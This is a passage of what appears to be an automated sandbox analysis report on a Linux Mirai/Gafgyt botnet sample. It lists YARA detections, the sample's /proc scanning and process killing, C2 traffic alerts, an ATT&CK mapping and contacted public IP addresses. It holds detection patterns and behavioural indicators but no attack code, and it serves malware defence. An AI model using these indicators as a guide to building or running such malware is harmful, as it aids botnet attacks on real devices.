        Source: 5570.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
        Source: 6024.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 6024.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
        Source: 6024.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
        Source: 6027.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 6027.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
        Source: 6027.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
        Source: 5490.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 5490.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
        Source: 5490.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
        Source: 6086.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 6086.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
        Source: 6086.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
        Source: Process Memory Space: rLMjh4RBTM.elf PID: 5490, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: Process Memory Space: rLMjh4RBTM.elf PID: 5570, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: Process Memory Space: rLMjh4RBTM.elf PID: 5610, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: Process Memory Space: rLMjh4RBTM.elf PID: 6024, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: Process Memory Space: rLMjh4RBTM.elf PID: 6027, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: Process Memory Space: rLMjh4RBTM.elf PID: 6086, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: classification engineClassification label: mal100.spre.troj.linELF@0/0@2/0

        Persistence and Installation Behavior

        barindex
        Sample reads /proc/mounts (often used for finding a writable filesystem)
        Source: /bin/fusermount (PID: 5566)File: /proc/5566/mountsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/1583/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/1583/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/1583/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/1583/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/2672/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/2672/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/2672/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/2672/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/110/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/110/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/110/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/110/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/111/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/111/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/111/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/111/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/112/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/112/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/112/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/112/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/113/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/113/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/113/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/113/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/234/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/234/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/234/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/234/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/114/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/114/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/114/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/114/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/235/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/235/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/235/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/235/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/115/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/115/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/115/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/115/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/116/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/116/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/116/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/116/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/117/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/117/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/117/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/117/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/118/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/118/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/118/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/118/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/119/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/119/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/119/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/119/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/10/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/10/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/10/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/10/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/917/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/917/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/917/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/917/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/11/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/11/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/11/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/11/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/12/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/12/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/12/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/12/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/13/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/13/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/13/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/13/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/14/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/14/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/14/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/14/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/15/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/15/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/15/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/15/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/16/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/16/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/16/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/16/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/17/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/17/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/17/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/17/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/18/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/18/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/18/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/18/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/19/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/19/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/19/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/19/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/240/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/240/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/240/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/240/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/120/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/120/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/120/mapsJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)File opened: /proc/120/cmdlineJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5570)Reads from proc file: /proc/statJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected Mirai
        Source: Yara matchFile source: rLMjh4RBTM.elf, type: SAMPLE
        Source: Yara matchFile source: 5610.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5570.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6024.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6027.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5490.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6086.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Yara detected Okiru
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 5490, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 5570, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 5610, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 6024, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 6027, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 6086, type: MEMORYSTR
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
        Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11

        Remote Access Functionality

        barindex
        Detected Mirai
        Source: TrafficSnort IDS: ETPRO TROJAN ELF/Mirai Variant CnC Command Inbound
        Source: TrafficSnort IDS: ETPRO TROJAN ELF/Mirai Variant CnC Command Inbound
        Yara detected Mirai
        Source: Yara matchFile source: rLMjh4RBTM.elf, type: SAMPLE
        Source: Yara matchFile source: 5610.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5570.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6024.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6027.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5490.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6086.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORY
        Yara detected Okiru
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 5490, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 5570, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 5610, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 6024, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 6027, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rLMjh4RBTM.elf PID: 6086, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid Accounts1
        Command and Scripting Interpreter        		1
        Scripting        		Path Interception1
        Masquerading        		1
        OS Credential Dumping        		1
        File and Directory Discovery        		Remote ServicesData from Local System1
        Data Obfuscation        		Exfiltration Over Other Network Medium1
        Service Stop
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
        System Information Discovery        		Remote Desktop ProtocolData from Removable Media1
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging2
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact

        Malware Configuration

        No configs have been found

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1416385 Sample: rLMjh4RBTM.elf Startdate: 27/03/2024 Architecture: LINUX Score: 100 30 67.94.108.221, 23 XO-AS15US United States 2->30 32 139.5.69.231, 23 WLINK-NEPAL-AS-APWorldLinkCommunicationsPvtLtdNP Nepal 2->32 34 99 other IPs or domains 2->34 38 Snort IDS alert for network traffic 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 44 6 other signatures 2->44 8 rLMjh4RBTM.elf 2->8         started        10 gvfsd-fuse fusermount 2->10         started        13 gnome-session-binary sh gsd-sharing 2->13         started        15 28 other processes 2->15 signatures3 process4 signatures5 17 rLMjh4RBTM.elf 8->17         started        20 rLMjh4RBTM.elf 8->20         started        46 Sample reads /proc/mounts (often used for finding a writable filesystem) 10->46 process6 signatures7 36 Sample tries to kill multiple processes (SIGKILL) 17->36 22 rLMjh4RBTM.elf 20->22         started        24 rLMjh4RBTM.elf 20->24         started        26 rLMjh4RBTM.elf 20->26         started        28 2 other processes 20->28 process8

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        rLMjh4RBTM.elf55%ReversingLabsLinux.Trojan.Mirai
        rLMjh4RBTM.elf58%VirustotalBrowse
        rLMjh4RBTM.elf100%AviraEXP/ELF.Mirai.Z.A
        rLMjh4RBTM.elf100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        daisy.ubuntu.com
        		162.213.35.24
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/soap/encoding/rLMjh4RBTM.elffalse
            		high
            http://schemas.xmlsoap.org/soap/envelope/rLMjh4RBTM.elffalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              12.189.132.14
              		unknownUnited States
              		7018ATT-INTERNET4USfalse
              140.212.144.53
              		unknownUnited States
              		40623GFDLUSfalse
              255.15.158.168
              		unknownReserved
              		unknownunknownfalse
              60.90.247.212
              		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
              111.88.154.10
              		unknownPakistan
              		58895EBONE1-PKEboneNetworkPVTLimitedPKfalse
              155.144.182.131
              		unknownAustralia
              		1221ASN-TELSTRATelstraCorporationLtdAUfalse
              54.64.177.77
              		unknownUnited States
              		16509AMAZON-02USfalse
              129.49.121.84
              		unknownUnited States
              		5719SUNYSBUSfalse
              217.40.11.148
              		unknownUnited Kingdom
              		2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
              144.207.2.92
              		unknownUnited States
              		6801FederalStateInstitutionRussianScientificCenterKurchatofalse
              167.149.161.63
              		unknownUnited States
              		25899LSNETUSfalse
              201.24.30.149
              		unknownBrazil
              		8167BrasilTelecomSA-FilialDistritoFederalBRfalse
              87.82.61.177
              		unknownUnited Kingdom
              		4589EASYNETEasynetGlobalServicesEUfalse
              219.16.203.89
